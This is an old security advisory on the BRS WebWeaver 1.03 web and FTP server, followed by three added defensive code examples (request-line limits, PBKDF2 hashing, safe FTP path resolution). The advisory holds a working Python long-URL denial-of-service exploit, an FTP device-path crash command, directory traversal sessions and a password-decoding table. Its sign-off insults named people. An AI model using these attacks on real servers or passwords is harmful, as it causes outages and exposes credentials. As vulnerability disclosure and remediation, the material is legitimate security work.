=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic:            BRS WebWeaver: full disclosure
product:          BRS WebWeaver 1.03
vendor:           http://www.brswebweaver.com
risk:             high
date:             31/03/2k3
tested platform:  Windows 98 Second Edition
discovered by:    euronymous /F0KP
advisory urls:    http://f0kp.iplus.ru/bz/019.en.txt
                  http://f0kp.iplus.ru/bz/019.ru.txt
contact email:    euronymous@iplus.ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

Issues
------

1. DOS Device Path vulnerability in FTP Server
2. Long URL DoS in HTTP Server
3. Weak Encryption Scheme
4. Remote System Information Gathering
5. Path Disclosure in FTP Server
6. Directory Traversal in FTP Server


1. DOS Device Path vulnerability in FTP Server
----------------------------------------------

I have found that the FTP server does not check the path typed by the
user. A malicious local user can crash the FTP (and also the HTTP) server
on an unpatched Windows 98 machine. Just type this command in a WebWeaver
FTP session:

    cd /aux/aux/

After this the server goes down..

Solutions:
1) Apply the corresponding patch for your Windows
2) Wait for a new version of WebWeaver
3) Remove this crap altogether ))


2. Long URL DoS in HTTP Server
------------------------------

If any local/remote user passes the HTTP server a URL containing 2499361
characters, the server crashes within 2-5 minutes. It eats all RAM and
finally hangs the whole system; a reboot is needed.

Exploit as below:

}------- start of fWWhtdos.py ---------------{
#!/usr/bin/env python
###
# WebWeaver 1.03 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fWWhtdos.py target
# Ex.:   ./fWWhtdos.py 127.0.0.1
########
# Python 2 script (httplib). Sends a single GET whose path is 2499361
# characters long and prints the status code of whatever comes back.
import sys, httplib

target = sys.argv[1]
spl = "f"*2499361
conn = httplib.HTTPConnection(target)
conn.request("GET", "/"+spl)
r1 = conn.getresponse()
print r1.status
}--------- end of fWWhtdos.py ---------------{

The following appears in WebWeaver's error.log:

}-------------------------- start of error.log ------------------------{
31/Mar/2003:04:28:52 LOG_ALERT ERROR: Thread Manager TerminateThreads Timed Out
31/Mar/2003:04:28:52 LOG_ALERT ERROR: Thread Manager TerminateThreads Timed Out
31/Mar/2003:04:28:52 LOG_WARNING Admin Thread NOT Stopped! NOT ASSIGNED!
}--------------------------- end of error.log -------------------------{

Solutions:
1) Wait for a new version of WebWeaver
2) Remove this crap altogether ))


3. Weak Encryption Scheme
-------------------------

WebWeaver `encrypts' FTP users' passwords, and all password hashes are
stored in the \config\users.ini file under the WebWeaver installation
directory. Data is stored in the following format:

    user=hashed_passwd

Passwords are not case-sensitive for WebWeaver. Below you can see the
encryption table (each encrypted row sits above its plain row):

    g i k m o q s u w e          == encrypted
    1 2 3 4 5 6 7 8 9 0          == plain

    з у П й н ч п Ч г е ╩ ?      == encrypted
    q w e r t y u i o p [ ]      == plain

    З л Н С У Х Щ Ы Э { S        == encrypted
    a s d f g h j k l ; '        == plain

    щ х Л с Й б Я ] a c          == encrypted
    z x c v b n m , . /          == plain

Any local user can get this file [users.ini] and `decrypt' the user
passwords.

Solutions:
1) Wait for the WebWeaver vendor to implement a strong encryption scheme
   like MD5 or Blowfish.
2) Remove this crap altogether )).


4. Remote System Information Gathering
--------------------------------------

Any remote user can get a lot of useful information about the system where
BRS WebWeaver is installed.
If the test CGI scripts were installed during the installation procedure
[the default], it is enough to go to this URL:

    http://hostname/scripts/testcgi.exe

}--------------- start of testcgi.exe output ---------------{
CGI Test Program

Arguments To Testcgi
Argument 1 :

Environment Variables
HTTP_CONNECTION = keep-alive
HTTP_KEEP_ALIVE = 300
HTTP_ACCEPT_CHARSET = utf-8,*
HTTP_ACCEPT_ENCODING = gzip,deflate,compress;q=0.9
HTTP_ACCEPT_LANGUAGE = ru-ru,ru;q=0.5
HTTP_ACCEPT = text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
HTTP_USER_AGENT = Mozilla/5.0 (Windows; U; Win98; ru-RU; rv:1.3) Gecko/20030309
HTTP_HOST = localhost
SERVER_PORT = 80
URL = /scripts/testcgi.exe
LOCAL_ADDR = 195.***.**.**
CONTENT_LENGTH = 0
SERVER_SOFTWARE = BRS WebWeaver/1.03
SERVER_PROTOCOL = HTTP/1.0
SERVER_NAME = ******30
REMOTE_HOST = 127.0.0.1
REMOTE_ADDR = 127.0.0.1
REQUEST_METHOD = GET
DOCUMENT_ROOT = c:\program files\webweaver
SCRIPT_NAME = /scripts/testcgi.exe
GATEWAY_INTERFACE = CGI/1.1
WINDIR = C:\WINDOWS
CMDLINE = WIN
COMSPEC = C:\WINDOWS\COMMAND.COM
PATH = C:\WINDOWS;C:\WINDOWS\COMMAND
WINBOOTDIR = C:\WINDOWS
PROMPT = $p$g
TEMP = C:\WINDOWS\TEMP
TMP = C:\WINDOWS\TEMP

Miscellaneous Information
Working directory: C:/Program Files/WebWeaver/scripts/
Current date and time: 2003/03/31 5:07:32
}--------------- end of testcgi.exe output ---------------{

Solution: Remove this script from the /scripts/ directory.


5. Path Disclosure in FTP Server
--------------------------------

I wrote about this vulnerability in v1.01 of WebWeaver already:
http://f0kp.iplus.ru/bz/012.en.txt
It was published on the Bugtraq mailing list, but in v1.03 this flaw still
has not been fixed.

}-------------- sample session -----------{
220 BRS WebWeaver FTP Server ready.
User (********.***.*****.***:(none)): 123
331 Password required for 123.
Password:
230 User 123 logged in.
ftp> pwd
257 "/" is current directory.
ftp> mkdir test
257 '/test': directory created.
ftp> mkdir test
550 'c:\ftp\test': can't create directory.
ftp> rmdir test
250 '/test': directory removed.
ftp> rmdir test
550 'c:\ftp\test': no such directory.
ftp>
}-------------- sample session -----------{

So, if a user attempts to create an already existing directory or to
remove a non-existent directory, the FTP server outputs the full system
path.

Solutions:
1) Wait for a new version of WebWeaver
2) Remove this crap altogether ))


6. Directory Traversal in FTP Server
------------------------------------

I wrote about this vulnerability in v1.01 of WebWeaver already:
http://f0kp.iplus.ru/bz/012.en.txt
It was published on the Bugtraq mailing list, but in v1.03 this flaw still
has not been fixed.

}-------------- sample session -----------{
220 BRS WebWeaver FTP Server ready.
User (********.***.*****.***:(none)): 123
331 Password required for 123.
Password:
230 User 123 logged in.
ftp> pwd
257 "/" is current directory.
ftp> mkdir ../test
257 '/..\test': directory created.
ftp> rmdir ../test
250 '/..\test': directory removed.
ftp> mkdir ../windows/test
257 '/..\windows\test': directory created.
ftp> rmdir ../windows/test
250 '/..\windows\test': directory removed.
ftp>
}-------------- sample session -----------{

As you can see, any user can exploit this traversal bug to create and
remove directories outside ftp_root. But the user cannot use more useful
commands like `ls', `dir'.

Solutions:
1) Wait for a new version of WebWeaver
2) Remove this crap altogether ))


shouts: R00tC0de, DWC, DHG, HUNGOSH, security.nnov.ru, all russian
        security guyz!! to kate especially ))

f*ck_off: slavomira and other dirty ppl in *.kz $#%&^! k0dsweb f*cking team

================ im not a lame, not yet a hacker ================
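Added example for issue 2 (not code from the advisory or from the WebWeaver vendor): the long-URL crash happens because the server buffers the whole request line before deciding anything. A server that reads the request line with a fixed byte budget and refuses oversized lines never holds more than that budget in memory. The 8192-byte limit is an assumption for this example, not a WebWeaver setting; the oversized input is constructed to match the advisory's 2499361-character path.

```python
import io

MAX_REQUEST_LINE = 8192  # byte budget; an assumption for this example


def read_request_line(stream, limit=MAX_REQUEST_LINE):
    """Read one HTTP request line without buffering more than `limit` bytes.

    Returns ((method, target, version), None) on success, or
    (None, reply_bytes) when the line must be refused and the connection
    closed. readline(limit + 1) stops after limit + 1 bytes even when no
    newline has been seen, so an endless path cannot grow the buffer.
    """
    line = stream.readline(limit + 1)
    if len(line) > limit:
        # No line terminator within the budget: the client is sending a
        # request-URI we are not willing to store. Refuse and stop reading.
        return None, b"HTTP/1.0 414 Request-URI Too Long\r\n\r\n"
    if not line.endswith(b"\n"):
        # Stream ended mid-line (client went away or sent garbage).
        return None, b"HTTP/1.0 400 Bad Request\r\n\r\n"
    parts = line.rstrip(b"\r\n").split(b" ")
    if len(parts) != 3:
        return None, b"HTTP/1.0 400 Bad Request\r\n\r\n"
    return tuple(p.decode("ascii", "replace") for p in parts), None


def check_request(raw):
    """Convenience wrapper: parse a request given as bytes (constructed input)."""
    return read_request_line(io.BytesIO(raw))


if __name__ == "__main__":
    # Constructed inputs: a normal request and the advisory's 2499361-byte path.
    print(check_request(b"GET /index.html HTTP/1.0\r\n"))
    print(check_request(b"GET /" + b"f" * 2499361 + b" HTTP/1.1\r\n"))
```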
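Added example for issue 3 (not code from the advisory or from the WebWeaver vendor): it reproduces only the digit row of the substitution table above (the other rows are mis-encoded on the page) to show why a fixed, keyless substitution is not a password hash, and contrasts it with a salted, iterated PBKDF2-HMAC-SHA256 record that cannot be reversed and does not reveal which users share a password. The record format `pbkdf2_sha256$iterations$salt$digest` is an assumption of this example.

```python
import hashlib
import hmac
import os

# Digit row of the WebWeaver table from the advisory: plain "1234567890"
# is stored as "gikmoqsuwe". Other characters are left untouched here.
WEAK_TABLE = str.maketrans("1234567890", "gikmoqsuwe")


def weak_store(password):
    """WebWeaver-style 'encryption': a fixed substitution with no key or salt.

    Case-folded (the advisory says passwords are not case-sensitive), same
    length as the input, and identical for identical passwords: the stored
    value is the password itself written in another alphabet.
    """
    return password.lower().translate(WEAK_TABLE)


def strong_store(password, salt=None, iterations=200_000):
    """Salted, iterated one-way hash; the record cannot be turned back into the password."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def strong_verify(password, record):
    """Recompute the digest with the stored salt and compare in constant time."""
    algo, iterations, salt_hex, digest_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


def leaks_equal_passwords(store, passwords):
    """True if someone holding the stored records can tell that two users share a password."""
    records = [store(p) for p in passwords]
    return len(set(records)) < len(records)


if __name__ == "__main__":
    users = ["1234", "1234", "abcd"]  # constructed sample passwords
    print(weak_store("1234"), leaks_equal_passwords(weak_store, users))
    print(leaks_equal_passwords(strong_store, users))
```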
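Added example covering issues 1, 5 and 6 together (not code from the advisory or from the WebWeaver vendor): a path resolver an FTP server can run on every client-supplied path before touching the file system. It refuses components that climb above ftp_root (the `../test` and `../windows/test` cases), refuses Windows reserved device names such as `aux` in any position, and builds replies from the virtual path only, so a failed MKD never echoes `c:\ftp\...`. The names `resolve_ftp_path`, `mkdir_reply` and `FtpPathError` are this example's own; the reply wording mirrors the sample sessions above.

```python
from pathlib import PureWindowsPath

# Windows reserved device names: a component such as "aux" or "aux.txt"
# names the device, not a file, in whatever directory it appears.
RESERVED_DEVICES = {"CON", "PRN", "AUX", "NUL"} | {
    f"{p}{n}" for p in ("COM", "LPT") for n in range(1, 10)
}


class FtpPathError(Exception):
    """Raised for a rejected path; the message never contains the physical path."""


def resolve_ftp_path(ftp_root, cwd, requested):
    """Map a client-supplied path onto the tree under ftp_root.

    Returns (virtual_path, physical_path). Both '/' and '\\' are accepted as
    separators, since the server's own replies show mixed '/..\\test' forms.
    """
    raw = requested.replace("\\", "/")
    base = "/" if raw.startswith("/") else cwd
    parts = []
    for piece in base.split("/") + raw.split("/"):
        if piece in ("", "."):
            continue
        if piece == "..":
            if not parts:
                # Would climb above ftp_root: refuse instead of creating
                # '/..\\test' outside the tree.
                raise FtpPathError(f"'{requested}': permission denied")
            parts.pop()
            continue
        # Windows ignores any extension when matching device names.
        if piece.split(".", 1)[0].upper() in RESERVED_DEVICES:
            raise FtpPathError(f"'{requested}': invalid name")
        parts.append(piece)
    virtual = "/" + "/".join(parts)
    return virtual, str(PureWindowsPath(ftp_root).joinpath(*parts))


def mkdir_reply(ftp_root, cwd, requested, existing):
    """FTP reply for MKD; `existing` is the set of physical dirs (constructed state).

    Errors quote the virtual path only, fixing the disclosure of issue 5.
    """
    try:
        virtual, physical = resolve_ftp_path(ftp_root, cwd, requested)
    except FtpPathError as exc:
        return f"550 {exc}"
    if physical in existing:
        return f"550 '{virtual}': can't create directory"
    existing.add(physical)
    return f"257 '{virtual}': directory created"
```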